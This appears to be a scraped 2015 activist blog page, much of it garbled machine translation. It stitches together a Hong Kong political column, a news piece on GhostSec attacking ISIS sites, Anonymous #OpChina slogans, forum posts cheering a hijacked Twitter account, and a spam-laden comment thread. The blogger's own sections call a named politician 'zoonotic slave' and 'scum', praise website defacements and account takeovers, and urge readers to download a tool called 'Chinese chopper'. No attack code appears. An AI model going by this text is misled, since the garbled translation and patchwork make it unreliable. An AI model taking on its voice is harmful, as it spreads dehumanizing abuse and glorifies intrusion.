Auch erwarten mehr technischen Elite-Hersteller entwickelt ein wenig mehr als eine Umgehung Werkzeuge / VPN / TOR ..
Lassen Sie die Menschen auf der ganzen Welt können auch Internet besuchen über der Wand des Wissens,
Grenzenloses Wohl ~

Danke für mehr Menschen von Technologie-Sharing!
Melody.Blog Sincerely Danksagung ~

===

関係なく、地理学のある知識を求めます
異なる国、異なる文化を持っています、
私たちは同じ空の下で暮らす、同じ人間です。

 p@r@dox17 人間は2つだけ種=善玉と悪者です。
ではなく、異なる国、異なる色、異なる宗教、異なるクラスのため、
さまざまな教育/経験、異なる言語..etc。、
障害を通信するために、得られた人々。


私たちの生活を豊かにするための知識/経験、
無料の空で、
我々は、それが現実的なネットワーク環境である、探索/シーク
これが享受すべきであるすべての人の権利です。

唯一の共産独裁者は、知識を求めている彼らの人々を閉じています
共産党独裁暴力的な獣は、その人々を恐れているの彼らの政権を転覆しています!

人権の享受は、我々は、ダウン生まれました
2015年、情報技術の進歩
我々は、より多くの人々がブロックされた情報/知識を求めていることを願って
そして、より多くの人々はまた、Googleの偉大な神の広い範囲を使用することを願って
人生の豊かな色彩の味をお楽しみください!

最後に、転覆壁にこの「中国のチョッパー」を警告してください、
また、ダウンロードを続行..and共有することを望みます
また、期待するより技術的なエリートのメーカーは回避ツール/ VPN / TORより少しを開発しました..
世界中の人々はまた、知識の壁の上でインターネットを訪問することができましょう、
無限の善行〜

技術の共有をより多くの人々をありがとう!
Melody.Blog敬具感謝祭〜

===


 *- Update[11/09-2015] seek knowledge regardless of geographical, see expert analysis (1)."oldest" Koran fragment "- the Russian people to learn,, is in how it forms and tutorials ?(2).Judgments about information security. sage and teacher Yin Fu in [part.1], recorded by his disciple s.- (3).from our chivalrous Anonymous fire@cat's blog, he gives us a software tool, this tool name called "Chinese chopper", which we are curious strange name, so we use our Great God Google search ..freebuf.com ..! -
-更新[11/09-2015]尋求知識不分地域,看專家分析(1)."最古老的“古蘭經片段"-俄羅斯人們的學習,,是在怎樣的形式和教程的呢?(2).Judgments關於信息安全。至聖先師尹福在【系統Part.1],記錄了他的弟子們..!.-(3).從我們的俠義匿名fire@cat的博客中,他給我們一種軟件工具,這工具的名字稱為"中國菜刀",這陌生的名字我們感到好奇,於是便運用我們的谷歌大神搜索了..freebuf.com..!-
- Update [11/09-2015] suchen, Wissen unabhängig von geographischen, siehe Expertenanalyse (1) "älteste" Koran-Fragment. "- Das russische Volk zu lernen, ,, ist, wie es bildet und Tutorials (2)....!-
- アップデート[11/09から2015]専門家の分析(1)"最古"コーランフラグメント」を参照してくださいに関係なく、地理の知識を求めて - (2)について.Judgments,,...!-**All The World Lauguage**-

 http://melody-free-shaing.blogspot.com/2015/09/update-1009-2015-from-taiwan-disp.html
===Melody.Bloy===FOLLOW===>/

 http://hk.apple.nextmedia.com/news/art/20150912/19292687


Ping On ︰  Leung Chun-Ying - hopeless situation, he was elected hopeless!

 2017 Chief Executive election marking time, in the central control, many people worry that Mr. Leung will be re-elected. July 13 Girder to Beijing, the first to re-election to represent unplanned, see Zhang after changed to say: "As long as there is the opportunity to have space, I will do my utmost to serve the Hong Kong community," public opinion was that he had get Beijing blessing.

But then all the signs of the past two months, have shown that re-calculation of the beam can be said almost hopeless. Beam hopeless situation. Even if he can drag retiring the next two years as a lame duck, no longer able to control everything.
Standing still must review the proposed standard when the Chinese Communist Party. July 2011 Macau Affairs Office Director Wang Guangya met with 访京团 when, under chief executive pointed out that three conditions are: patriotic and love Hong Kong, with executive governance capability and social acceptability. Although this is not "the Basic Law" set of conditions, but can not imagine the CCP will change.

Three conditions CCP chief executive

Social acceptability is popularity. Autocratic political popularity of this care, which is Mr. Leung believes in the power of philosophy: For a long time only for his re-CCP acceptability and the Hong Kong community does not care about his acceptability. However, Hong Kong media after exposure under international monitoring, if completely ignoring the chief executive of the social acceptability of the control of the Chinese Communist Party is a very small circle election disgrace. When the 2012 election, Beijing abandoned midway horses take Tang Liang, although Liang CCP "one of us", but the key is tactics to discredit polls overwhelming popularity Tang Liang, leaving the CPC for horses with "social acceptability sex "basis.


Since girder chief executive, the popularity of long-term decline, even Dong, who took office at the beginning of the popularity of the honeymoon period did not appear before, the long-term rating is negative points, referred to as "failed." His latest popularity ratings dropped to 38.5 points, the lowest score since taking office hit.
But even worse is that his attitude. Politicians all over the world face lower popularity, would cause alarm in response to said, to remind ourselves to improve governance. Even lies also the public at least a little more comfortable. However, Liang special response: refer to another poll, say show rates compared with the previous increase of 0.8 points. When the community is so special beam disgust, but he feel good about themselves. This not only makes hard to improve his popularity, the CCP will see his social acceptability will also continue to dip.


Another three conditions, "a senior government power", not to mention. Since taking office beam, almost nothing. He does not have a good team, whether government officials or guild members, are being questioned but pro or against their own people fancy (tun wave or ritual weigh) inclusive, and he replaced his own officials do not like the way too brutal cheap.
Speak in terms of performance compared to only cater to public opinion and ordered a halt to double non-limiting milk order, but in fact can only cheat people do not understand the economy of applause.  

There is dissent on behalf of the Liberal Party of businesses and professionals. Liberal Party Honorary Chairman Selina said recently that the two practice "does not consider the long-term negative consequences, but the knife cut down in order to cope with the crisis before ...... from the market economy point of view to consider, with a variety of techniques to dampen demand, the economy must have an adverse effect. "
In addition to the two outside, especially in the face beams out several achievements, or prevarication of the Legislative Council, "Raab," or prevarication busy political reform over the past two years. The problem is that only occasionally Mr Raab, the fact is that the Government did not propose any better policy to the Legislative Council. As busy political reform, is the last two years the entire government can only do one thing, all bureaux must stop the hand stays on political reform Down?

Do not close to the situation into a stranger

There are three conditions to build a Communist tyrant "Basic Law," the "love the motherland and Hong Kong", its actual meaning is "Love Party", that obey the CCP's orders. The vast majority of the establishment faction, including government officials, are basically in line with this condition, but now the situation is that almost all establishment faction must keep a distance from Leung Chun-ying. Publication of the beams are especially dissatisfied with the Liberal Party, James Tien and keep a safe distance from the beam is special DAB, in an interview on the beam special irony implicit criticism has Tsang Yok-sing, Mrs Fan.  

It is said that almost all of the establishment faction activities, including the establishment of Tung Solidarity Fund, are considered to invite a guest Leung Chun-ying, the results were discouraged public relations. If you invite the chief executive to visit any activity, not only glory, but have a negative effect. Mr Tsang to have a higher popularity rating, especially because he and Liang stay away; Zheng Lin seems to go astray, and to maintain a safe distance with the beam special. Public Liang Liang special powder recently rarely mentioned, even a stooge of the "White House spokesman," Lee recently reminded Plus, do not write him Liang special "Reds." Opera "hearsay" where a stranger do not nearly pretty well describe this situation is: "Washing river fish also died, passing Aoyama tree also withered."

More than a year in the next few elections, all candidates establishment faction, may all face a problem: whether to support Mr Leung? I believe their answers have chosen to draw the line with the beam, so as not to lose points.
Leung Chun-ying of the key changes on the Chinese Communist Party, is the beam after the political reform was rejected asked to see Zhang Dejiang, five degrees after he reiterated Zhang for his work "highly positive", "satisfied", but hinted that it would seek re-election. Xinhua News Agency dispatch but made no mention of Zhang Dejiang his affirmation.  

Girder apparently by Zhang Dejiang lift their position in the government camp in Hong Kong, so that "Love Party" Hong Kong people identified central support his re-election, so that other aspirations who intend to abandon the race. This, by the central bridge girder special wrist, how could the CCP do not see? So in silent changes came. This is called: tricks too, anti-he lost his tail.
Leung Chun-ying hopeless situation. From the Hong Kong people, to distance themselves from the establishment faction, from the attitudes of the CCP, if all. Will step down ahead, we must look at who the CCP is the favorite successor.
(Https://www.facebook.com/mrleeyee)

Li Yi published Monday to Saturday Our  favorite Apple Daily Forum famous writer^^
       Li Yi  

 Chase real thing burst size city that like Apple [site] FB!
 ===
 http://hk.apple.nextmedia.com/news/art/20150912/19292687


蘋論︰梁振英大勢已去,連任無望!



2017年特首選舉原地踏步,在中央掌控下,許多人擔心梁振英會連任。7月13日梁特赴京,去前表示對連任無計劃,見張德江後即改口說:「只要有機會、有 空間,我一定會盡我最大努力為香港社會服務。」當時輿論認為他已得到北京祝福。
但隨後兩個月來的種種迹象,卻顯示梁的連任計算幾乎可以說是無望。梁的大勢已去。他即使能拖到任滿,未來兩年也如跛腳鴨,不再能掌控一切了。

原 地踏步就要回顧當年中共提出的標準。2011年7月港澳辦主任王光亞會見訪京團時,指出下任特首的三個條件是:愛國愛港、具高管治能力和社會認受性。儘管 這不是《基本法》所定的條件,但不能設想中共會改變。

中共對特首的三條件

社會認受性就是民望。專權政治本不在意民望,這也是梁振英信奉的權力哲學:長期以來只重中共對他的認受性而毫不在意香港社會對他的認受性。但香港畢竟置身 國際媒體監視之下,若完全無視特首的社會認受性,對掌控小圈子選舉的中共就是極丟臉的事。2012年選戰時,北京中途換馬棄唐取梁,儘管梁是中共「自己 人」,但關鍵是抹黑戰術使民調中梁的民望壓倒唐,而使中共對換馬有了「社會認受性」的依據。

梁任特首以來,民望長期走低,連董、曾上任之初的民望蜜月期都沒有出現過,評分長期是負分,被指為「失敗」。他的最新民望評分更跌至38.5分,創上任以來最低分數。
但 更要命的是他的態度。全世界的政治人物面對民望走低,都會回應說引起警惕,要鞭策自己,改善施政。即使是假話也至少令市民舒服些。可是,梁特的回應是:引 用另一民調,說顯示評分較前上升了0.8分。當社會對梁特如此厭惡的時候,他卻自我感覺良好。這不僅使他的民望再難有改善,中共也會看到他的社會認受性將 繼續探底也。

三條件的另一個「具高管治能力」,就更不用說了。梁上任以來,幾乎一事無成。他沒有一個良好的團隊,無論政府官員還是行會成員,都被質疑任人惟親或對自己人(囤地波或唔得掂)的包容,而他撤換自己不喜的官員的手法也橫蠻粗劣。
政 績講來講去較迎合民意的只有喊停雙非和限奶令,但事實上只能騙取不懂經濟的市民的掌聲。代表商界和專業人士的自由黨就有異議。自由黨榮譽主席周梁淑怡日前 表示,這兩項做法「並不考慮長遠的負面後果,只是一刀斬下去以應付面前的危機……從市場經濟角度去考慮,用種種手法去打擊需求,對經濟一定有不良影響」。

除 了這兩項之外,梁特面對數不出來的政績,或是推諉立法會議員「拉布」,或是推諉過去兩年忙於政改。問題是議員只是偶而拉布,事實是政府沒有向立法會提出任 何較好的政策。至於忙政改,難道過去兩年整個政府只能做一件事,所有政策局都要停手撐政改乎?

陷入生人勿近的處境

三條件還有一個中共僭建《基本法》的「愛國愛港」,其實際含義就是「愛黨」,也即聽從中共的號令。絕大部份的建制派,包括官員,基本上都符合這個條件,但 現在情勢是,幾乎所有建制派都要與梁振英保持距離。

公開對梁特不滿的有田北俊和自由黨,與梁特保持安全距離的是民建聯議員,在訪談中對梁特暗含批評嘲諷的 有曾鈺成、范太。據聞幾乎所有建制派活動,包括董建華成立團結基金,都考慮過邀請梁振英做嘉賓,結果均被公關勸止。任何活動若邀特首光臨,不僅不是榮耀, 反而有負面效果。曾俊華能有較高民望,是因為他與梁特離得遠遠;而林鄭似乎也學乖了,與梁特保持一個安全距離。眾梁粉近來絕少提到梁特,連跟屁蟲的「白宮 發言人」最近也提醒李八方,不要寫他是梁特「紅人」。歌劇《劉三姐》其中一句頗能形容這種生人勿近的處境,就是:「河邊洗手魚也死,路過青山樹也枯」。


接下來一年多的幾次選舉,所有參選的建制派,可能都會面對一個問題:是否支持梁振英?相信他們的回答都選擇與梁劃清界線,以免失分。
中 共對梁振英的關鍵轉變,是梁在政改被否決後求見張德江,會後他五度重申張對他的工作「高度肯定」、「十分滿意」,更暗示會爭取連任。但新華社發稿卻隻字不 提張德江對他的肯定。梁特顯然是借張德江拉抬自己在香港建制派中的地位,使香港「愛黨」人士認定中央支持他連任,讓其他有意問鼎者放棄角逐。

梁特這種借中 央過橋的手腕,中共豈會看不出來?於是在無聲中變化就來了。這叫做:機關算盡太聰明,反誤了卿卿性命。
梁振英大勢已去。從香港市民人心,從建制派的撇清,從中共的取態,都若是。會不會提前下台,就要看中共心儀的接任者是誰了。
https://www.facebook.com/mrleeyee

"李怡 先生.
周一至周六刊出 *我們最喜愛的蘋果日報論壇著名作家*
      Mr. 李怡  

 Chase real thing burst size city that like Apple [site] FB!
 =====
 https://www.hackread.com/anonymous-ghostsec-attacing-isis/

Anonymous Offshoot GhostSec Launches Another Phase of Attacks Against ISIS


Another phase of an online battle against the members of the so-called Islamic State (IS, previously ISIS/ISIL) group has been launched throughout the world by the Anonymous hacktivists.
These activists are targeting and attacking the online network of supporters and suspected websites of the IS group.
Recently, an emerging offshot of the Anonymous group codenamed GhostSec has revealed that their group members are actively participating in attacking thousands of social media accounts and publicity websites that are being operated by ISIS group.
anonymous-hacking-group-ghostsec-attacks-islamic-state
This anonymous group has also claimed that they have successfully caught and interrupted messages sent between the IS group members when an attack in Tunisia was being planned.
GhostSec, also known as Ghost Security, comprises of 12 listed hackers but apart from that, most of the members are anonymous and working secretly on different projects. The group is under operational since past seven to eight months and pursues towards the monitoring and flagging of different web properties and social media accounts apparently being used by Islamic State.

The Ghost Security members prepared a list of potential Twitter accounts that are being used by the jihadists. By reporting those accounts to Twitter, they have managed to take down more than 60,000 accounts linked to the IS members.
“Every innocent life that Islamic extremists take only serves to strengthen our power and determination. Those who are lost have become part of us.” – GhostSec
This achievement encouraged the anonymous group members to launch a wide range of services including Distributed Denial of Service (DDoS) attacks, brute force attacks, SQL injection.
These advanced attacking methods allowed the group to take down IS websites for a period of time, which results in ceasing their communication network. But their most recent claims disclosed that the GhostSec group caught and interrupted messages sent between the IS group members, and then forwarded those messages to the international law enforcement agency.

It is impossible to speculate that how much of an impact has been made alone by these Anonymous groups in the termination of IS online presence and networks. However, these successful attempts have increased the prominence of Anonymous groups and have resulted in enraging a fight between the cyber forces of the IS jihadists and various Anonymous groups.






, We know you can feel us now. Which one of you is next?

On the other hand, analysis reveals that the jihadists of Islamic State group are choosing to transfer their web properties to US-hosted websites in an attempt to protect their web-based operations against hacking attempts because strict laws of the United States prohibits hacking.

The members of GhostSec group have also published their mission statement on (ghostsec.org), which states, “Our mission is to eliminate the online presence of Islamic extremist groups such as Islamic State (IS), Al-Qaeda, Al-Nusra, Boko Haram and Al-Shabaab in an effort to stymie their recruitment and limit their ability to organize international terrorist efforts.
GhostSec is the same group who made the news for exposing pro-ISIS sites and hosting companies protecting them.

 ===
 

Farzan Hussain

I am Mohammad Farzan! A technology and gadget enthusiast as well as a creative content writer with over six years of experience in writing engaging content. You will mostly find me writing occasional blog posts, designing websites, capturing photos, social networking and listening to music.

 =====
 https://www.hackread.com/anonymous-ghostsec-attacing-isis/

匿名支流GhostSec啟動攻擊ISIS的另一個階段


 對所謂的伊斯蘭國成員的聯機對戰另一個階段(IS,以前ISIS / ISIL)集團已經推出在世界各地的匿名黑客行動主義者
這些積極分子的目標和攻擊的支持者和IS組疑似網站的在線網絡
近日,匿名組的新興offshot代號為GhostSec曾透露,他們的小組成員都積極參與進攻成千上萬正在通過ISIS集團經營的社交媒體賬戶和宣傳網站。
匿名黑客基的ghostsec-攻擊伊斯蘭國家
該匿名小組還聲稱,他們已經成功地捕獲並中斷了IS組成員之間發送的消息正在計劃在突尼斯攻擊時。
GhostSec,也被稱為鬼安全 ,包括12家上市黑客,但除此之外,大部分的成員都是匿名的,並且在不同的項目工作的秘密。 該集團正在運作,因為過去的七八個月,追求對不同的網絡資產以及社交媒體帳戶顯然正在由伊斯蘭國監督和檢舉。
鬼保安人員準備了正在使用的聖戰者潛在的Twitter帳戶的列表。 通過報告這些賬戶到Twitter,他們已經成功地採取了超過60,000帳戶鏈接到IS的成員。
“每一個無辜的生命,伊斯蘭極端分子採取只會加強我們的力量和決心。 這些誰丟失已經成為我們的一部分。“ - GhostSec
這一成績鼓舞匿名組成員開展了廣泛的服務,包括分佈式拒絕服務(DDoS)攻擊,暴力攻擊,SQL注入。
這些先進的攻擊方法允許組取下來是一段時間,這導致停止其通信網絡的網站。 但他們最近的債權透露,GhostSec組捕獲並中斷了IS組成員之間發送的消息,然後轉發這些消息給國際執法機構。
這是不可能推測多少影響已單獨由這些匿名團體的終止網上業務和網絡。 然而,這些成功的嘗試增加了匿名群體的顯著性,並導致激怒了IS聖戰者的網絡力量和各種匿名團體之間的鬥爭。


, We know you can feel us now. Which one of you is next?

 在另一方面,分析表明,伊斯蘭國集團的聖戰主義者都選擇在保護他們的網絡為基礎的行動,打擊黑客攻擊,因為美國嚴格的法律禁止黑客攻擊企圖的網頁內容傳送到美國的託管網站。


 GhostSec組的成員也紛紛發表自己的使命聲明(ghostsec.org),其中指出,“我們的任務是消除伊斯蘭極端組織,例如伊斯蘭國(IS)的網上存在,基地組織,基地Nusra,博科聖地和青年黨在努力阻礙其招聘和限制他們組織國際恐怖主義工作的能力。“
GhostSec是誰做的新聞曝光的同一組 親ISIS網站和託管公司保護他們

 ===
 

Farzan侯賽因

我是穆罕默德·Farzan! 一種技術和小工具愛好者,以及有超過六年經驗的創造性內容的作家以書面形式引人入勝的內容。 你會大多是找我偶爾寫博客文章,設計網站,拍攝照片,社交網絡和聽音樂。

 =====

p@r@dox17 9月10日














 9月10日
by p@r@dox17 .. --------------------------
 






 p@r@dox17 9月10日
by p@r@dox17 .. --------------------------






 p@r@dox17 9月9日







 p@r@dox17  9月9日
hello China again ... by p@r@dox17 .. -------






 =====
















 "Autocracy greedy local officials in this world,
The most brazen, most ignore the masses, most without review their own incompetence ,
Most

do not attract media,, coverage of despicable person is zoonotic' slave" thief wolf Leung Chun-ying !!

Only know toward corruption - communist dictatorship zoonotic knees worship,
Never to speak of his governments achievements !he never have...

Compliance with the protocol on people, righteousness, honesty, to know shame; cordial treat; morally correct doing things / treat others
This is referred to in history - called " Honesty and Honor";
In Chinese[=華人] society is a kind of  guidelines.

Unfortunately zoonotic ' slave ' thief wolf Leung Chun-ying, has become an anti-rules, anti-humanity, anti-historical,
His survival in the history of Chinese[=華人] shame!
Correct to say = it is a "scum"!

Recently, Hong Kong people are in the process of '' double the chief executive '' in the political situation,
That one  is a slave to zoonotic is suffering authoritarian ,regime under thief wolf Leung chun-ying ' suffering (government) '
Another is filing for civil election for Hong Kong citizens to vote arising from civil society government!

Zoonotic ' slave '- thief wolf Leung Chun-ying, unscrupulous and incompetent;
See the Rare news reported - since he took office a year is at most seven times to around tourism,
Abuse - of Hong Kong peoples's tax coffers money!

And instruction the zoonotic public security  - cast of violence assault of pepper spray and 87 tear gas to treat hong kong citizens!
More ruining the integrity of Hong Kong for many years and talents known in the international arena!

Continental zoonotic autocratic greed, the life of the people considered to be zero,
Deprivation of the property of the people and the life and liberty,
Deprivation of the Uygur, to safeguard human rights lawyers.
Assault the dissidents ,
Deprivation peoples and put them in the prison, torture, deprivation of human organs to live.

Manufacturing poisonous food / toxic substances ./ nuclear chemical / dangerous plants,
Poison global air pollution, poison the lives of people around the world! {Particular counterfeiting imitation Taobao !!}

This is the best reason for the French news media not  to reports this zoonotic continent = the mainland false news / zoonotic continent had "self-censorship" in!

Under the same sky, you and I are the same human beings!
We also has eyes, ears, skin, limbs, hair and body, even if the body has a defect,
We are also same human beings!

Why 2015 in civilized and open technology era,
Because these communist dictatorship greedy beast; they affect people's normal life ??!

Conscience able to identify the authenticity !
Good and evil Clear-cut !

In tiny life, we make every effort to accuse the communist dictatorial regime violence!
In reality, and the network, we also give a part to play!

Although it is impossible to obtain immediate outcomes,
But we know that the huge and chivalrous Anonymous will lend a helping hand !
To greedy tyrant dictatorship crashing revenge! "

Anonymous will not make people feel alone and helpless

Anonymous does not forget!
Anonymous does not forgive!

We are Anonymous!
We are Legion!

Expect..us...

#OpISIS #OPHK #OP_Tibet OPKOREAN
#opchina #optaiwan #OpRussian

Melody.Blog sincerely pray...

=====

"世界上的專制獨裁貪婪的地方官員,
最厚顏無恥的,最漠視群眾的,最不撿討自己的無能,
最不吸引媒介報導的卑鄙之人便是畜共奴隸賊狼梁振英!!

只對共產獨裁畜共跪下膜拜,
從沒政積可言!

對人們的守禮,行義,廉潔,以懂得羞恥;謙厚寬廣處事/對待別人..
這在歷史中簡稱為-禮義廉恥;
是華人社會中一種待人的準則.

可惜畜共奴隸賊狼梁振英,卻成了一個反規則,反人道,反歷史,
他的生存在恥辱了華人的歷史!
正確的説法=牠是一個"人渣"!

最近香港人們正籌備著''雙特首''政情中,
即一個為畜共專制政權下的奴隸賊狼梁振英''正苦'',
一個為民間社會立案選舉,供市民投票而產生的香港民間政府!

畜共奴隸賊狼梁振英,無良無能;
上任以來最多見新聞的便是一年放了7次大假到處旅游,
濫用香港市民的繳稅庫房金錢!
和指使畜共暴力公安毆打市民,施放胡椒噴霧器和87催淚彈對待游行市民!
更敗壞了香港多年廉潔與精英人才而聞名於國際上!

大陸畜共專制獨裁貪婪,把人民的生命視為零,
把人民的財産及生命和自由剝奪,
對維吾爾族,對維護人權律師,對人民的異見人士施以暴力,
施以囚牢,施以酷刑,施以活剝奪人體器官.
製造有毒食物/有毒物品./核化學/危險工廠,
毒害污染全球空氣,毒害全球人們的生命!{尤其製造假冒仿制品的淘寶網!!}

這便是法國國家現在的全國媒體不再報導大陸假新聞/大陸畜共已"自我審查"的新聞的最佳理由!

同一天空下,你和我都一樣是人類!
我們同樣有著眼睛,耳朵,皮膚,四肢,頭髮和身體,即使身體有著缺陷,
我們也同樣是人類!

為何在文明開放科技尖端的2015年,
因為這些共產主義獨裁貪婪的畜牲;而影响了人們正常的生活??!

良知能夠辨認真偽!
善良和罪惡清晰分明

我們在渺小的人生中能夠發聲控訴,
在廣大的網絡和現實中獻出一分力

雖然不可能立即得到成果
但是我們知道偉大而俠義的匿名會伸出緩助之手
對貪婪獨裁的暴君施以轟然報復!"

匿名不會讓人們感到孤獨無助

匿名不會忘記
匿名不會原諒

我們是匿名
我們是軍團

期待...我們

#OpISIS #OPHK #OP_Tibet OPKOREAN
#opchina #optaiwan #OpRussian

Melody.Blog真誠祈求...

=====


*- Update [11-09-2015] Our favorite Apple Daily Forum famous writer " Mr. Li Yi ", portrays the voice of Hong Kong's 7 million citizens! -& By the hackread.com/anonymous-ghostsec-attacing-isis/ ]-&- By-p@r@dox17[ ‏ 9月10日]-#TangoDown by p@r@dox17 ..#Palestine_DZ #AnonGhost #OpChina
-更新[11-09-2015]我們最喜愛的蘋果日報論壇著名作家李怡先生,描寫出了香港7000000市民的心聲!-與hackread.com/anonymous-ghostsec-attacing-isis/ ]-與由-p@r@dox17[ ‏ 9月10日]-#TangoDown by p@r@dox17 ..#Palestine_DZ #AnonGhost #OpChina ]-**All The World Lauguage**-

 http://melody-free-shaing.blogspot.com/2015/09/update-1009-2015-from-taiwan-disp.html
=====#############
http://disp.cc/b/14-8Um0
 Title: Chinese Honker challenge Anonymous
Time: 2015-08-18 Tue.

 Tianjin nuclear chemical explosions things should not talk to you and say xD directly into the key!

Tianjin, the government should say the bird attitude is deliberately masked the fact that I do not know there xDDD (it should be said that only I do not know QAQ ...

Interception news anonymous in order to help people seek justice in Tianjin, in some sites look to Anonymous #OpChina (attack) action!

The day before the Chinese government some 20 sites have been linked to the home page, the only one I just shot yesterday to noon restored ... Lol ^^

[圖]
 Apple Daily news sites http://www.appledaily.com.tw/realtim...71614/applesearch/Tianjin Municipal Government website! ... were once again hacked!

But there are still Chinese Honker (hackers) with the Anonymous under gauntlet (? XDDD

He sent the text:



 From his posting, my little translation brief that his confession languagehahahaha.... (we require anonymous Anonymous stop attacks within two days), if not stop the hand will be fully Anonymous attacker as related blog site, I look through the next ( It seems full of many Anonymous persons he wants to attack @Shashi@XD!! hahahaha....Who claimed to be: Tiger snake lizard (China Honker members) hahahaha....go to Baidu to find a moment to find his Twitter: https: //twitter.com/Tigersnakeliz >>slaves<<
hahahaha...Inquired the next, like a stationmaster Honker Union of China forum, what will follow Anonymous what kind of spark plug Let us read on !!! *>> Anonymous is omnipotent <<*(such as bamboo Sheng).

 ===
 ※ Author: zxc5867146 Time: 2015-08-18 14:21:36※ Kanban: Chat
 Cumulative Popularity: 15663.

 *[Note: We really very like and enjoyed ^^]~


r) Replymomoptt+2 08-18 15:13Shina red gram not go check Tim refined corpse explosion death toll track event? He truly went to google to check the real history of the old common article Afree_man08-18 16:24You might have a lot of good people can suck fluid $$$$$$$$$$$$$$$$qazw73613(Edited)I wait for him to surrender time to buy firecrackers to celebrate ~yolo21308-18 16:31Please fifth floor masturbationYellowBoy+2 08-18 17:04English is translated by Google thing? How to see how ring true ... stop the hand = stop there?eaz45608-18 17:07Anonymous not also anti lesson outline it? Results blanket ~azx8761308-18 17:55What kind of spark plugmityoung08-18 18:11A total of Wanjun will not head it!?MorrisCiou+1 08-18 18:41And so it was worth seeing CPC Cyber ​​Armyzxc586714608-18 18:46Sitting in a spectacular haha ​​xDDDdirefish08-18 19:09I think hackers are good English proficiency, how there's so urine?
 
cjhs5408808-19 14:36Honker network hierarchy probably more than Communist army almost ...... but this damn rotten English to have left......
=== 
 http://disp.cc/b/14-8Uo5



 On zxc5867146 (DIekdo)Title: anonymous invasion of China Honker twitter accountTime 2015-08-18 Tue.

Are all user also remember the last time I send text, Chinese Honker with Anonymous Taiwan singled it xDDD!^^I think what Anonymous  huge Legion will win his black account...At night, a called Anonymous member "(Laeo)" had to go.....

See the  Picture  show the Story !!
 [圖]
 Really funny^^
CCP hackers??! haha xDDD...


 ※ Author: zxc5867146 Time: 2015-08-18 20:26:51※ Kanban: Chat

 ( ̄︶ ̄)b zxc5867146, karta1085215, tsu805, microken, coolnoss, lunsea1617, kx7823 total of seven individuals like this!

 qazw7361308-18 21:03`∀ ') ゚ ∀ ゚) σσ`∀') ゚ ∀ ゚) σ ah ha ha ha ~ you look! ʱ?? To change bear a ~Pushinugami08-18 21:05GG Yeah! Ha ha ha ~ ~ ~ ~castle101108-18 21:11A left and right cheek hurts me XDtsu80508-18 21:44Incidentally, what can hack it difficult to ejaculate Q_Qhuzc060608-18 22:29Push, China Honker, which will not only Fifty Cent Party, right?zxc586714608-18 23:30Very thoroughly brainwashedhugo197408-19 13:17so fast


=====
http://disp.cc/b/14-8Um0
 作者
標題
 匿名者入侵中國紅客推特帳戶

時間 2015-08-18 Tue. 20:26:51


大家還記得我上次發的文,中國紅客跟匿名者台灣單挑的吧xDDD


我在想哪時匿名者會拿下來他的帳戶...


就在晚上,一個叫匿名者成員(Laeo) 拿下來了.....


看圖說故事!!



[圖]
 


真搞笑 中共的駭客 哈哈xDDD

--
※ 作者: zxc5867146 時間: 2015-08-18 20:26:51
※ 看板: Chat  累積人氣: 13636. 


( ̄︶ ̄)b zxc5867146, karta1085215, tsu805, microken, coolnoss, lunsea1617, kx7823 共 7 個人 說讚!

  08-18 21:03
`∀′) ゚∀゚)σσ`∀′) ゚∀゚)σ 啊哈哈哈~你看看你!!要變狗熊了~

  08-18 21:05
GG呀!哈哈哈~~~~

  08-18 21:11
我左右臉頰 好痛阿XD
  08-18 21:44
可以順便駭一下射精難嗎Q_Q
  08-18 22:29
推一下,中國紅客,該不會只是五毛黨吧?
  08-18 23:30
被洗腦得很徹底


  08-19 13:17
真快

 =====

 



 '' Last night photographed scenes of conflict fragment of PLB drivers means, triggering event is the police attitude problem, rather than the copy does not copy licensing issue. ʱ??[Movie] [Wang Hung Van accounted event uncovering illegally parked minibus Pa Lujing serious influx of linking no law enforcement]http://bit.ly/1EQTy6f[Someone's umbrella during the police operation satire staff]http://bit.ly/1EQTy6k[Police ultra large fine red lines forced Van Park Street? ʱ??http://bit.ly/1EQTy6oCheung Dickson, Mak Chi Cheung, Wong Tik Fai as well as 4,664 other people say praise.620 share.Hang Jai Alec] - but also Hong Kong people speak Youmie Suju Zhang Guangfu ??? ???4 hours ago;Cattle sophisticated] - cold to see crabs, to see how long he rampage?3 · 4 hours ago;Raphael Lai] - no problem Wai attitude ... Well at least have a few bad evil polices=差佬= 㩒 you will be again in the ring to burst your anus, and then if you resist so their entire pro Youmie problem that way?!? When accounting for the Pulled you received, even applauded, but the point home solutions acceptable Wudao scare you?3 · 4 hours ago;[3 Reply · about 1 hour ago]Ho Yan Kwan] - what classes you agree tide Union occupied Oh !!!4 hours ago;Barbie Boone] - Police = cheap thief 😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈1 · 4 hours ago;Ken Pang] - Black Police Department several twenty years are Link3 hours ago;Conrad Chow] - selective, back to the sixties and seventies, police incompetence5 · 3 hours ago;Lima Chan] - laughing Left3 hours ago;Ming Wong] - 4 条 Xian Pa goo three lines Cilao all Wuli lawlessness2 · 3 hours ago;[1 reply] =Matthew Harris] - do not hesitate to spend money to travel abroad!Method >> http://ppt.cc/279QQhttp://mishao.weebly.com/Misery a good way!Office workers, students, housewives over here !!!!!Own "pay" their rescue work hard not change your quality of life ...!{Mishao.weebly.com)3 hours ago;Chan Lok] - the name of the taxi and minibus that left Nuisance attitude, hilarious,3 hours ago;Charmingly Wong] - Chung Department Kowloon Walled City Times baa?3 hours ago;Seven Mok] - dogs, they are all afraid of this final master both ~1 · 3 hours ago;Wang Jingyi] - Police useless dog!3 hours ago;Zhao Jingchen] - police suppressed people of Dalat microphone underworld gangster Excuse me instantly ... sorry sorry to go along with chicken feet Link!??!2 · 3 hours ago;Michael Mak] - an injunction friends. ʱ??2 · 3 hours ago;Chow Sing Sing] - wise line 689 under the leadership of the police difference completely return to the 1970s, lawlessness,Before the media will have a secondary account, do the next play, according to Wu Li family made clear, well respond !!9 · 3 hours ago; edited;Siu Lok Lam] - copy your card than you cock. Below you estimate a problem with ??!3 hours ago;Amy Lau] - Tide brand ah United Cilao dare copy and drinking places have DAB Air planes, you copy the license holder stupid !!4 · 3 hours ago;Ben Luk] - Nuisance fork with the police!Link only to suddenly spring!2 · 3 hours ago;Eric Tong] - lCAC ?? not working ??!3 hours ago;(2 replies) · 3 hours ago;WH Suen] - equally to someone clothing rack!1 · 3 hours ago;Kevin HY Lui] - is a red minibus, minibuses not any yellow ribbon,,, Wild blue creature Wugan do cater Wudao wild!Students know the net system to play.1 · 3 hours ago; edited;Ricky Wong] - China's return to the left to close regulation.6 · 3 hours ago;Patrick Li] - A snake Wuzuo Ye!There grain out artificial increase. that's nice!4 · 3 hours ago;Wing Chan] - because they are patriotic .... slaves (haha ...)3 · 3 